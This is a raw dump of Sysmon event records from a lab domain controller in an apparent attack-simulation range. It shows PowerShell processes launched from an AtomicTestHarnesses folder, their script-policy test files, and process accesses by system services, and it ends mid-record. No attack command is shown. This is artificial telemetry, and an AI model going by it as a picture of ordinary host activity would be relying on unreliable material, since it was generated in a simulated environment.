16:51:42.574{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932\PSHost.132591775024908296.12932.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.559{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wel0fwbn.ft2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.559{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mv3jn5on.3y5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.543{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mv3jn5on.3y5.ps12021-03-02 16:51:42.543 10341000x80000000000000002234955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.523{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.481{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.490{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Comman Write-Host 45776adc-c1cf-42fd-aea2-040c02ee408aC:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.465{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.356{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.356{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.323{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.322{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002234941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:51:42.293{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356\PSHost.132591775022035569.13356.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.277{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_b0fbozoo.a4n.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.277{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_fq43n4pr.haz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.262{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_fq43n4pr.haz.ps12021-03-02 16:51:42.262 10341000x80000000000000002234937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.223{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.199{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImage